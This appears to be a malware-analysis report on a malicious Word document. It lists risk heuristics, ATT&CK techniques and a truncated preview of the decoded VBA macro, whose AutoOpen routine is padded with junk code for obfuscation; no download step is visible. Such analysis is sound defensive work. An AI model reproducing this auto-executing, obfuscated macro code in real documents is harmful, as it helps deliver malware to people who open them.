MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and configured to execute automatically, indicating an attempt to run malicious code upon opening. Heuristics indicate the use of GetObject, which can be used to execute code. The macro is heavily obfuscated, but its presence and automatic execution suggest it's designed to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6666852-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6666852-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42474 bytes |
SHA-256: fa5647267ef474fb415f180d4e98fec8fe87b53ed7ab341851fa6fb4fecb9596 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub lavYNEwKadaZIgEpiHya()
Debug.Print "coneTyTEbUtubESIKBIxO"
Dim DUcAhOCOReBIFECdUKk
For DUcAhOCOReBIFECdUKk = 10 To 10
Dim ZEsUQuZAmoXEWaZevAPuv
ZEsUQuZAmoXEWaZevAPuv = Fix(54733)
Next
Dim qIWOvhOPetUiUtOLYVYw
Debug.Print "LeWEseBydYK"
Dim wUSkUlIkEzElopoSU
wUSkUlIkEzElopoSU = Rnd(139)
If wUSkUlIkEzElopoSU > 38116 Then
wUSkUlIkEzElopoSU = Exp(9)
End If
qIWOvhOPetUiUtOLYVYw = Rnd(119)
ZOOnARogadErIiy = Val("65521.6") & "kXzEgESomOpu"
If qIWOvhOPetUiUtOLYVYw > 41343 Then
Dim ZAcYKIiYDIDAmavOsOZesgi
ZAcYKIiYDIDAmavOsOZesgi = Rnd(128)
If ZAcYKIiYDIDAmavOsOZesgi > 70526 Then
ZAcYKIiYDIDAmavOsOZesgi = Exp(8)
End If
qIWOvhOPetUiUtOLYVYw = Exp(9)
End If
BuGAhIhuaGesoKAWu = Val("53866.7") & "PuDItawupoHofOHAq"
fyXUaJECYboXOfOqiV = InStr("XyQPohODUqnua", "XyQPohODUqnuaXyQPohODUqnua")
Dim XUSiiEaVIjuLyVYLiWIVEla
Dim falMEnudyheJUfo
falMEnudyheJUfo = Log(9)
falMEnudyheJUfo = falMEnudyheJUfo + Log(11)
For XUSiiEaVIjuLyVYLiWIVEla = 5 To 13
Dim aAQaHiHAcumODaiYCiv
aAQaHiHAcumODaiYCiv = Fix(63590)
johEVWakUBoS = InStr("TPUWxiVoJ", "TPUWxiVoJTPUWxiVoJ")
Next
Dim kIDyTyKykuWySOD
kIDyTyKykuWySOD = Rnd(137)
If kIDyTyKykuWySOD > 46572 Then
kIDyTyKykuWySOD = Exp(7)
End If
QIzIjYbyjaq = Val("52345.6") & "dyKinEnaluBalOcILah"
Dim VipEDUDyXyWuLyNAmoBuwE
VipEDUDyXyWuLyNAmoBuwE = Log(4)
VipEDUDyXyWuLyNAmoBuwE = VipEDUDyXyWuLyNAmoBuwE + Log(13)
End Sub
Sub AutoOpen()
Dim Pefmudfq
Pefmudfq = Log(9)
Pefmudfq = Pefmudfq + Log(13)
Dim SeaoXIFOmaz
SeaoXIFOmaz = Log(6)
Dim ritASUGiBiNyJYgUFO
ritASUGiBiNyJYgUFO = Rnd(139)
If ritASUGiBiNyJYgUFO > 53597 Then
ritASUGiBiNyJYgUFO = Exp(9)
End If
Debug.Print "lowrUmiNEz"
SeaoXIFOmaz = SeaoXIFOmaz + Log(12)
tinuMYDixIhihIiokAPpOG = Val("69621.3") & "LyquluKEtYsaPOdevIKIr"
LFEwApIaoVUORYpO = 50460
Dim pItoXEUTEGEfIMA
For pItoXEUTEGEfIMA = 1 To 13
Dim maVUZAvobYt
maVUZAvobYt = Fix(45358)
Next
On Error Resume Next
Dim MoTEbOjuFygyvUZOb
MoTEbOjuFygyvUZOb = Rnd(105)
If MoTEbOjuFygyvUZOb > 33349 Then
MoTEbOjuFygyvUZOb = Exp(5)
End If
Dim geQiDynOXora
geQiDynOXora = Rnd(126)
If geQiDynOXora > 65488 Then
geQiDynOXora = Exp(6)
End If
Dim BOdoTEJwYkYaoUSEfeM
Dim iYPUJAgaBbEGUZ
For iYPUJAgaBbEGUZ = 6 To 10
Dim WzaduWaiIG
WzaduWaiIG = Fix(13905)
Next
BOdoTEJwYkYaoUSEfeM = Log(2)
Dim DaJabaCokYB
For DaJabaCokYB = 6 To 11
Dim iIZePOaAROZotoPmeSyheS
iIZePOaAROZotoPmeSyheS = Fix(98579)
Next
BOdoTEJwYkYaoUSEfeM = BOdoTEJwYkYaoUSEfeM + Log(13)
HeBozYLytiKyn = Val("79318.8") & "ikEieButYkEgeiOTYwo"
Dim ciJUPOctAr
For ciJUPOctAr = 1 To 12
Dim TEhRtAQAgiqISIRefyxEtE
TEhRtAQAgiqISIRefyxEtE = Fix(61358)
Next
Debug.Print "BuLeBecoroCUlAjorOb"
RaXaGIAZaZIioiAQzy = ""
Dim goJUmUOkUMovOtUpo
goJUmUOkUMovOtUpo = Rnd(115)
If goJUmUOkUMovOtUpo > 45302 Then
goJUmUOkUMovOtUpo = Exp(5)
End If
JUmTyQcEze = InStr("luUjEpIaeRYFOiIsEWog", "luUjEpIaeRYFOiIsEWogluUjEpIaeRYFOiIsEWog")
Dim JOqYaJYhectylOqASY
For JOqYaJYhectylOqASY = 6 To 13
Dim BEwErIKIToFytA
BEwErIKIToFytA = Fix(29506)
Next
lyCaseODOw = InStr("noWUSizihOPAsd", "noWUSizihOPAsdnoWUSizihOPAsd")
Dim vEbotiWLevufUPiwIrywAg
JIWINoQAXoBOuP = InStr("VEsDYjUsedIPIdaBuNIp", "VEsDYjUsedIPIdaBuNIpVEsDYjUsedIPIdaBuNIp")
KerySUCELuXF = Val("10967.4") & "PYVUWAdecYxetUv"
For vEbotiWLevufUPiwIrywAg = 1 To 10
Dim TAHNOvoMOgy
Dim syBOJETYHApibitAweZECa
syBOJETYHApibitAweZECa = Log(9)
syBOJETYHApibitAweZECa = syBOJETYHApibitAweZECa + Log(11)
TAHNOvoMOgy = Fix(76614)
zYSYkYjYvAH = InStr("HuiyJITyqeLyLUkUXuxYk", "HuiyJITyqeLyLUkUXuxYkHuiyJITyqeLyLUkUXuxYk")
Dim peCIreRuXEBe
For peCIreRuXEBe = 4 To 11
Dim raQeQIiaporer
raQeQIiaporer = Fix(91362)
Next
Next
Dim lyqUwumIhjZOLyr
pEnABAquLOiaiqAtOzU
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.